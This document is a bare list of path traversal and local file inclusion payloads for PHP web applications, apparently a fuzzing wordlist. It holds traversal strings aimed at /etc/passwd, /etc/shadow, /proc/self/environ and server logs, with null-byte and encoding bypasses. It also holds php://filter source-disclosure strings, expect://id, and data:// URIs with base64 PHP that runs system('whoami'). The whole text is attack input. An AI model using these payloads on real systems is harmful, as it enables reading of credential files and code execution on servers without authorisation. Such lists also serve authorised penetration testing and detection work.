../../../../etc/passwd
../../../../etc/hosts
php://filter/convert.base64-encode/resource=index.php
../../../../etc/passwd
../../../../proc/self/environ
../../../../var/log/apache2/access.log
../../../../windows/win.ini
../../../../boot.ini
../../../../etc/hosts
../../../../../../../../../../etc/passwd%00
../../../../../../../../../../etc/shadow%00
../../../../../../../../../../proc/self/cmdline
../../../../../../../../../../var/www/html/index.php
../../../../etc/passwd
..%2f..%2f..%2fetc%2fpasswd
../../../../boot.ini
../../../../etc/shadow
../../../../var/log/auth.log
....//....//etc/passwd
../../../../../../../../etc/passwd
../../../proc/self/environ
../../../../../../../../proc/self/environ
../../../../../../../../windows/win.ini
../../../../../../../../boot.ini
php://filter/convert.base64-encode/resource=index.php
expect://id
data://text/plain;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTs/Pg==
/index.php?page=../../../../etc/passwd
/index.php?page=php://filter/resource=config
/index.php?page=../../../../../proc/self/environ
/index.php?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8+
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../etc/passwd%23
../../../../../../../etc/passwd%00.jpg
/index.php?page=....//....//....//etc/passwd
/index.php?module=../../../../../../etc/passwd
/index.php?page=/var/log/nginx/access.log
/index.php?page=/proc/version
/index.php?page=/etc/hostname
